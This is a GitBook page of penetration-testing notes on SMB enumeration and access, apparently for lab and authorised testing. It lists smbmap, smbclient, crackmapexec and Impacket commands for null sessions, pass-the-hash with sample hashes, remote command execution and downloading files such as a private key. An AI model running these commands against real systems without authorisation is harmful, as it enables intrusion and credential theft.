Infrastructure penetration testing notes
  • Initial page
  • Table Of Content
  • Infrastructure testing
    • Enumeration
      • Packet Capture
      • Host Discovery
      • Services / Ports
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 53 - DNS
        • 67 - DHCP
        • 69 - TFTP
        • 79 - Finger
        • 88 - Kerberos
        • 111 - RPC
        • 113 - ident
        • 135 - MSRPC
        • 137 - Netbios
        • 139/445 - SMB
        • 161 - SNMP
        • 177 - XDMCP
        • 363 - LDAP
        • 443 - HTTPS
        • 500 - IKE (IPSEC)
        • 512/513/514 - R Services
        • 623 - IPMI
        • 873 - RSYNC
        • 1099 - Java RMI
        • 1433 - Microsoft SQL
        • 1521 - Oracle DB
        • 2049 - NFS
        • 3306 - MySQL
        • 3389 - RDP
        • 5432 - PostgresSQL
        • 5900 - VNC
        • 5985 - WinRM
        • 6000 - X11
        • 6379 - Redis
        • 8080 - Jenkins
        • 11211 - Memcached
        • RDS
        • SQLite
        • Docker
      • IPV6
        • Scanning
        • Enumeration
        • Transfering files
        • Pivoting and routes
        • THC IPv6
    • Gaining Access
      • IP Forwarding
      • VLAN Information
      • Psexec
      • Upgrading shell
      • Reverse Shells One-Liners
      • Bruteforce
      • MITM cleartext protocols
      • Null session
      • LLMNR / NBT NS Spoofing
      • Port knocking
      • Downloading/Transfer files
      • Remote Desktop
      • NAC Bypass
      • Pass-The-Hash
    • Exploitation
      • Solaris
      • IPv6
      • Windows
        • Compiling Code
        • SMB Vulnerabilities
        • Kerberos Attacks
    • Privilege Escalation
      • Situational Awareness
        • Linux
        • Windows
          • Registry
          • PowerView
          • FSMO Roles
      • Windows
        • Disable Apps and Firewall
        • Add user script
        • UAC Bypass
        • icacls
        • Running services
        • Common Exploits
      • Linux
        • SUID Shell script
        • CVE-2019-14287
        • Kernel exploit
      • Solaris
      • FreeBSD
      • Automated tools
      • Metasploit Modules
      • Password Dumping
    • Breakout
      • LOLBas
      • powershell constrained language byass
      • Alternatives to command prompt
      • Windows utilities
      • Applocker
      • Restricted shells
      • Environmental Variables / Bypassing Path Restrictions
      • Docker escape
      • Just Enough Administration (JEA)
    • Presistance
      • Windows
    • Pivoting
      • Adding routes
    • Password Cracking
      • Hashcat
      • John
      • Cisco Passwords
      • Passwords Lists
      • Generating wordlist
    • Tools
      • Nishang
      • UACME
      • Bypass-UAC
      • MSBuildAPICaller
      • Impacket
      • SharpPersist
      • Terminals
      • IP Calculation
      • pwsh
      • psTools / Sysinternals
      • Unlock applocker
      • enum4linux
      • Bloodhound
        • aclpwn
      • mitm6
      • Enyx
      • nfsshell
      • PowerUpSQL
      • Metasploit
        • msfvenom
    • Others
Powered by GitBook
On this page
  • Find version
  • Discover shares
  • Connect to share
  • Connect to the host
  • Pass The Hash
  • Null Session
  • Download files
  • Check for vulnerabilities
  • User Enumeration
  • Tools
  • smbclient
  • smbmap
  • Enum4Linux
  • Nmap
  • Metasploit
  • Impacket samrdump.py
  • Protocol Mismatch
  • Resources:

Was this helpful?

  1. Infrastructure testing
  2. Enumeration
  3. Services / Ports

139/445 - SMB

The Microsoft Server Message Block protocol was often used with NetBIOS over TCP/IP (NBT) over UDP, using port numbers 137 and 138, and TCP port numbers 137 and 139.

Find version

Find SMB version using metasploit:

Msfconsole;use scanner/smb/smb_version

Using nmap scripts:

nmap --script=smb-enum* --script-args=unsafe=1 -T5

Discover shares

smbmap:

smbmap -H [ip]

or

smbmap -H [ip] -d [domain] -u [user] -p [password]

smbclient:

smbclient //IP/Share

Or

smbclient -L //$TARGET

Nmap:

nmap --script smb-enum-shares -p139,445 -T4 -Pn

Connect to share

smbmap:

$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'

smbclient:

smbclient //$ip/share -U username

or

smbclient \\\\{IP}\\Share

Connect to the host

Crackmapexec:

crackmapexec smb -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183

Using smbexec:

crackmapexec smb --exec-method smbexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183

Pass The Hash

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107

Or

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 -R

Crackmapexec:

crackmapexec smb -u username -H LMHASH:NTHASH

Null Session

smbmap:

smbmap -H {IP}

rpcclient:

rpcclient -U "" -N {IP}

crackmapexec:

crackmapexec smb <target(s)> -u '' -p ''

Download files

using smbmap:

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 --download alice/my_private_key.ppk

using smbget

smbget -R smb://10.10.10.178/Secure$

using smbclient

root@kali# smbclient -U TempUser //10.10.10.178/Secure$ welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  5 07:05:22 2020
  ..                                  D        0  Fri Jun  5 07:05:22 2020
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  IT                                  D        0  Thu Aug  8 06:59:25 2019

                10485247 blocks of size 4096. 6545925 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \HR\*
NT_STATUS_ACCESS_DENIED listing \IT\*

Check for vulnerabilities

Using nmap:

nmap --script smb-vuln* -p139,445 -T4 -Pn

User Enumeration

Metasploit:

use auxiliary/scanner/smb/smb_enumusers

Tools

smbclient

smbclient -L //$TARGET

smbmap

If we have username and password:

smbmap -u tyler -p '92g!mA8BGjOirkL%OG*&' -H 10.10.10.97

Username and password for speciifc folder

smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' -H \\\\10.10.10.97\\new-site

PassTheHash

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107

Download a file

smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 --download alice/my_private_key.ppk

Enum4Linux

Does everything in 1 script:

enum4linux –a 10.0.0.1

Nmap

SMB enumeration using all scripts:

nmap --script=smb-enum* --script-args=unsafe=1 -T5

Metasploit

Find SMB version:

Msfconsole;use scanner/smb/smb_version

Enum users:

use auxiliary/scanner/smb/smb_enumusers

Impacket samrdump.py

Samrdump is an application that retrieves sensitive information about the specified target machine using the Security Account Manager (SAM). It is a remote interface that is accessible under the Distributed Computing Environment / Remote Procedure Calls (DCE/RPC) service. It lists out all the system shares, user accounts, and other useful information about the target’s presence in the local network. The image clearly shows us all the user accounts that are held by the remote machine. Inspecting all the available shares for sensitive data and accessing other user accounts can further reveal valuable information.

Syntax:

samrdump.py [domain]/[user]:[Password/Password Hash]@[Target IP Address]

Command:

samrdump.py ignite/Administrator:Ignite@987@192.168.1.105

Protocol Mismatch

When the following error is observed:

root@kali# smbclient -N //10.10.10.3/tmp 
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED

The client is set up for security reasons not to connect to older SMB versions.

By adding support to NT1 we can connect:

root@kali# smbclient -N //10.10.10.3/tmp --option='client min protocol=NT1' 
Anonymous login successful 
Try "help" to get a list of possible comman

You will need to add a line to the following file: my /etc/samba.smb.conf:

[global] 
client min protocol=NT1 

Resources:

Previous137 - NetbiosNext161 - SNMP

Last updated 4 years ago

Was this helpful?

https://docs.google.com/spreadsheets/d/1F9wUdEJv22HdqhSn6hy-QVtS7eumgZWYYrD-OSi6JOc/edit#gid=2080645025